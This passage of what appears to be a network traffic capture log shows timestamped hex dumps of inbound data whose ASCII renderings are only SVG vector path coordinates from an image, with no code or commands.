                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9977INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC9993INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10009INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10025INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10041INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                          Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10057INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10073INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10089INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10105INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10121INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10137INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10153INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10169INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10185INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10201INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10217INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10233INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
